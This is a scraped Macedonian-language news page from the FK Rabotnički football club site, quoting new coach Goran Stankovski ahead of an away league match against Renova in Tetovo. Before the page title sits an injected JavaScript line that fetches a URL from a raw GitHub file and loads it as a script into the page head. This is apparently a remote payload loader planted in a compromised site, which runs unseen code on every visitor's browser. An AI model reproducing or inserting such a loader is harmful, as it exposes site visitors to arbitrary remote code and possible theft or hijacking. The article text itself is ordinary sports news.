;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Станковски: Тимот почна да ги применува моите идеи
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Станковски: Тимот почна да ги применува моите идеи

По репрезентативната пауза, време е за старт на вториот круг од првенството во Првата фудбалска лига, а Работнички в сабота (14.30 часот) ќе и гостува на Ренова на Градскиот стадион во Тетово. Тренерот Горан Станковски во изминатите две седмици имаше многу повеќе можност да работи со фудбалерите, откако беше именуван за наследник на Виктор Треневски, пред осмото првенствено коло.

„Паузата беше добредојдена за мене и фудбалерите, да се запознаеме многу подобро и да одработиме дел од планираните активности, за подобрување на одредени сегменти во нашата игра. На изминатите два натпревари на кои го водев тимот од клупата, против Силекс на домашен терен (0-0) и против Скопје на гости (0-0), покажавме завидна дисциплина во дефанзивниот дел, па затоа сега многу повеќе внимание посветив на играта во офанзива. И морам да кажам дека има напредок, тимот почна да ги применува моите идеи. Одигравме пријателски натпревар со Шкупи, од кој можам да бидам задоволен. Сега не очекува продолжение на шампионатот и се надевам дека тимот ќе реагира на вистински начин на саботниот натпревар против Ренова во Тетово“, вели шефот на стручниот штаб, Горан Станковски.

Не е лесно да се игра против Ренова, но Станковски очекува позитивен епилог за Работнички.

„Ренова е квалитетен тим, составен од фудбалери кои долго време играат заедно и одлично функционираат. Имаат и квалитетен тренер на клупата, но ние веруваме во нашите квалитети и ќе отпатуваме во Тетово за да надигруваме. Мислам дека имаме реални шанси за да оствариме позитивен резултат“, истакнува Станковски.